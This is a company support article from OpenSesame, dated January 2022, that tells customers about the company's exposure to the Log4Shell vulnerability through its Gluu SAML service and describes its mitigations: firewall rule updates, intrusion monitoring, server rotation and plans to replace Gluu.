Last updated 11 January 2022
The OpenSesame team has examined our platform for any appearances of vulnerable versions of Apache’s logging utility, Log4j. The exploit, also known as “Log4Shell,” was publicly disclosed by Apache on 9 December 2021.
The few OpenSesame accounts that use SAML authentication to log in also use Gluu, the service that handles our SAML routing. Gluu employs a vulnerable version of Log4j, and details on our actions and investigation appear below.
No other OpenSesame accounts use services potentially affected by the Log4j vulnerability.
Gluu risk mitigation
Again, please note that only accounts using SAML authentication would use Gluu.
On Monday morning, 13 December 2021, we updated our Web Application Firewall (WAF) rules and have confirmed that they are blocking attackers seeking to exploit the Log4Shell vulnerability.
We have seen no indication of a breach or intrusion: neither our Endpoint Protection System (Sophos) nor our Intrusion Detection System (Threatstack) have registered any alerts platform-wide.
Out of an abundance of caution, we rotated out the Gluu EC2 server instances that were in service before our firewall change. We have inspected them and confirmed that they were never compromised.
We are now working to remove and replace Gluu.
This article will be updated when that process is complete.
If you have further questions, our Support team is here to help via email at email@example.com or via live chat and phone. Feel free to reach us at (503) 808-1268, ext. 2, or at +44 203 744 5541 in Europe.